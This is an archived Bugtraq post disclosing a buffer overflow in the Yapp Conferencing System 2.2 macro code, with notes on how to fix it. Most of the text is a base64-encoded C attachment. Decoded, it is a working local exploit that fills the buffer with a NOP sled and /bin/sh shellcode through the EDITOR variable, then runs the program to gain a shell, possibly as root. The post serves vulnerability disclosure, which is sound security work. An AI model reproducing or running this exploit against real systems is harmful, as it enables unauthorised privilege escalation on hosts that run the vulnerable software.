This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --0-2061607665-885284041=:1469 Content-Type: TEXT/PLAIN; charset=US-ASCII This is my first Bugtraq post, hope I'm doing this right... The Yapp Conferencing System Version 2.2 (and others?) has an exploitable buffer overrun in it's macro processing code. On line 215 of macro.c, we see: sprintf(buff,"%s=%s",name,value); The variable "value" is taken from the environment and is never checked to ensure that it's length does not exceed the ammount of space remaining in the buffer after "NAME=" has been inserted. It is trivial to overflow "buff" by defining "NAME" in the environment to contain a string longer then the size of "buff" (512 characters) minus the length of "NAME=". I have included an exploit which I wrote for Intel 80x86/Linux, it uses the variable "EDITOR" (which I selected compeletely at random). This bug is most like not going to have serious security implications, since Yapp hardly ever runs setuid root (in fact, the README suggests creating a special user to run Yapp as), but I could see a situation where an attacker gains access to the special Yapp uid, replaces the Yapp binary with a trojan version, and then waits for root to run it. If you're looking for a way to patch this hole, read the exploit source. ------------------------------------------------------------------------------- --0-2061607665-885284041=:1469 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="yapp_exploit.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.BSF.3.96.980120031401.1469Bat_private> Content-Description: LyoNCiAqIEV4cGxvaXQgZm9yICJZYXBwIENvbmZlcmVuY2luZyBTeXN0ZW0s IFZlcnNpb24gMi4yIi4NCiAqIEJ5IERhdmUgQm93bWFuLCBmb3IgU2FuZHJh LCBvbiBKYW51YXJ5IDEzIDE5OTguDQogKg0KICogRGVzY3JpcHRpb246DQog Kg0KICogVGhlIFlhcHAgQ29uZmVyZW5jaW5nIFN5c3RlbSBjbGllbnQgaGFu ZGxlcyBlbnZpcm9ubWVudCB2YXJpYWJsZXMNCiAqIHdpdGhvdXQgZG9pbmcg Ym91bmRzIGNoZWNraW5nLCBhbGxvd2luZyBvbmUgdG8gb3ZlcmZsb3cgYSBi dWZmZXIgDQogKiBpbiB0aGUgImJicyIgZXhlY3V0YWJsZSBvbnRvIHRoZSBz dGFjay4gVXNpbmcgdGhpcyB0ZWNobmlxdWUsIGl0DQogKiBwb3NzaWJsZSB0 byBvYnRhaW4gYSBzaGVsbCBydW5uaW5nIGFzIHRoZSB1c2VyIHdoaWNoIFlh cHAgaXMgc2V0dWlkDQogKiB0byAoaW4gc29tZSBjYXNlcywgcm9vdCkuDQog Kg0KICogVXNhZ2U6DQogKg0KICogYmFzaCQgZ2NjIC1vIHlhcHBfZXhwbG9p dCB5YXBwX2V4cGxvaXQuYw0KICogYmFzaCQgLi95YXBwX2V4cGxvaXQNCiAq IGJhc2gjDQogKg0KICogWW91J2xsIGhhdmUgdG8gY2hhbmdlIHRoZSBkZWZp bml0aW9uIG9mICJCQlNfUFJPR1JBTSIgaW4gdGhlIHNvdXJjZS4gWW91DQog KiBtYXkgYWxzbyBuZWVkIHRvIGFsdGVyIHRoZSBvZmZzZXQsIGJ1dCAtMTAw MCB3b3JrZWQgZm9yIG1lLg0KICoNCiAqIFRlbXBvcmFyeSBmaXg6DQogKg0K ICogYmFzaCMgY2htb2QgdS1zIC91c3IvbG9jYWwvYmluL2Jicw0KICoNCiAq IExvbmcgdGVybSBmaXg6DQogKg0KICogRWl0aGVyIGNoYW5nZSB0aGUgc3By aW50ZiAoMykgY2FsbCBvbiBsaW5lIDIxNSBvZiBtYWNyby5jIHRvIHNvbWV0 aGluZw0KICogd2hpY2ggY2hlY2tzIHRoZSBib3VuZHMgb2YgdGhlIGRhdGEg aXQgY29waWVzLCBvciBzaW1wbHkgZm9yY2Ugc3RyaW5ncw0KICogcmVhZCBp biBmcm9tIHRoZSBlbnZpcm9ubWVudCB0byBhIHNwZWNpZmljIGxlbmd0aCwg aS5lLg0KICoNCiAqIGVudl9zdHJpbmcgWzUxMV0gPSAnXDAnOw0KICoNCiAq IGlmIHlvdXIgYnVmZmVyIHdhcyA1MTIgY2hhcmFjdGVycyB3aWRlLiBQbGVh c2Uga2VlcCBpbiBtaW5kIGhvd2V2ZXIsDQogKiBpbiB0ZXJtcyBvZiBzZWN1 cml0eSwgWWFwcCBpcyBhIF92ZXJ5XyBwb29ybHkgd3JpdGVuIHByb2dyYW0g YW5kDQogKiBzaG91bGQgcHJvYmFibHkgbm90IHJ1biBzZXR1aWQgYW55b25l LCBsZXQgYWxvbmUgcm9vdC4gSWYgeW91IGNhbg0KICogcG9zc2libHkgYXZv aWQgaXQsIGRvbid0IHJ1biBZYXBwIHNldHVpZC4NCiAqDQogKiBBbmQgd2l0 aG91dCBmdXJ0aGVyIGFkby4uLg0KICoNCiAqLw0KDQojaWYgISBkZWZpbmVk IChfX2kzODZfXykgfHwgISBkZWZpbmVkIChfX2xpbnV4X18pDQojZXJyb3Ig SW50ZWwgODB4ODYvTGludXggcGxhdGZvcm0gcmVxdWlyZWQuDQojZW5kaWYN Cg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0K I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk ZWZpbmUgQlVGRlNJWkUJNTEyIC0gc3RybGVuICgiRURJVE9SPSIpCS8qIFNp emUgb2YgYnVmZmVyLiAqLw0KI2RlZmluZSBPRkZTRVQJCS0xMDAwCQkJCS8q IE9mZnNldC4gKi8NCiNkZWZpbmUgQkJTX1BST0dSQU0JIi9ob21lL2RhdmUv eWFwcC9iYnMiCQkvKiBQYXRoIHRvIHByb2dyYW0uICovDQoNCi8qIEZ1bmN0 aW9uIHdoaWNoIHJldHVybnMgdGhlIGJhc2UgYWRkcmVzcyBvZiB0aGUgc3Rh Y2suICovDQpsb25nIGdldF9lc3AgKHZvaWQpDQp7DQoJX19hc21fXyAoIm1v dmwgJWVzcCwgJWVheFxuIik7DQp9DQoNCi8qIE1hY2hpbmUgY29kZSBpbnN0 cnVjdGlvbnMgdG8gZXhlY3V0ZSAvYmluL3NoLCBJIGhhZCB0aGVtIGhlcmUg aW4gKi8NCi8qIGdsb2JhbCBmb3IgYSByZWFzb24gYW5kIG5vdyBJIGp1c3Qg ZG9uJ3QgZmVlbCBsaWtlIHBsYXlpbmcgd2l0aCAqLw0KLyogdGhlIHN0YWNr IG9mZnNldCBhbnltb3JlLiAqLw0KdW5zaWduZWQgY2hhciBleGVjX3NoZWxs IFtdID0NCiJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhc eDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KIlx4ODlceGYzXHg4ZFx4 NGVceDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0 MFx4Y2QiDQoiXHg4MFx4ZThceGRjXHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoN Ci8qIE1haW4gZnVuY3Rpb24sIGR1aC4gKi8NCmludCBtYWluICh2b2lkKQ0K ew0KCXVuc2lnbmVkIGNoYXIgYnVmZiBbNTE4XTsJCS8qIEJ1ZmZlciB0byBo b2xkIG91ciBkYXRhLiAqLw0KCXVuc2lnbmVkIGNoYXIgKnB0cjsJCQkvKiBQ b2ludGVyLiAqLw0KCWludCBjb3VudDsJCQkJLyogQ291bnRlci4gKi8NCgl1 bnNpZ25lZCBsb25nICphZGRyZXNzX3B0cjsJCS8qIExvbmcgcG9pbnRlci4g Ki8NCg0KCS8qIEZpcnN0IHdlIGZpbGwgdGhlIGJ1ZmZlciB3aXRoIE5PUCBp bnN0cnVjdGlvbnMuICovDQoJKHZvaWQpIG1lbXNldCAoYnVmZiwgMHg5MCwg c2l6ZW9mIChidWZmKSk7DQoNCgkvKiBUaGVuIHdlIGNvcHkgb3VyIHNoZWxs IGNvZGUgaW50byB0aGUgYnVmZmVyLiAqLw0KCXB0ciA9IGJ1ZmY7DQoJcHRy ICs9IEJVRkZTSVpFIC0gc3RybGVuIChleGVjX3NoZWxsKTsNCglmb3IgKGNv dW50ID0gMDsgY291bnQgPCBzdHJsZW4gKGV4ZWNfc2hlbGwpOyBjb3VudCsr KQ0KCQkqcHRyKysgPSBleGVjX3NoZWxsIFtjb3VudF07DQoJDQoJLyogTm93 IHdlIGluc2VydCBvdXIgcmV0dXJuIGFkZHJlc3MgaW50byBlYnAgYW5kIGVp cC4gKi8NCglhZGRyZXNzX3B0ciA9ICh1bnNpZ25lZCBsb25nICopICZidWZm IFs1MDldOw0KCWZvciAoY291bnQgPSAwOyBjb3VudCA8IDI7IGNvdW50Kysp DQoJCSphZGRyZXNzX3B0cisrID0gZ2V0X2VzcCAoKSArIE9GRlNFVDsNCgkN CgkvKiBIZXJlIHdlIHRlcm1pbmF0ZSB0aGUgYnVmZmVyIGFzIGEgc3RyaW5n Li4uICovDQoJcHRyID0gKHVuc2lnbmVkIGNoYXIgKikgYWRkcmVzc19wdHI7 DQoJKnB0ciA9ICdcMCc7DQoNCgkvKiBBbmQgYXR0ZW1wdCB0byBsb2FkIGl0 IGludG8gb3VyIGVudmlyb25tZW50LiAqLw0KCXVuc2V0ZW52ICgiRURJVE9S Iik7DQoJaWYgKHNldGVudiAoIkVESVRPUiIsIGJ1ZmYsIDEpKSB7DQoJCXBl cnJvciAoInNldGVudiIpOw0KCQlleGl0ICgxKTsNCgl9DQoNCgkvKiBGaW5h bGx5LCB3ZSBleGVjdXRlIFlhcHAuICovDQoJKHZvaWQpIGV4ZWNsIChCQlNf UFJPR1JBTSwgQkJTX1BST0dSQU0sIE5VTEwpOw0KCXBlcnJvciAoQkJTX1BS T0dSQU0pOw0KCWV4aXQgKDEpOw0KfQ0K --0-2061607665-885284041=:1469--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:40:13 PDT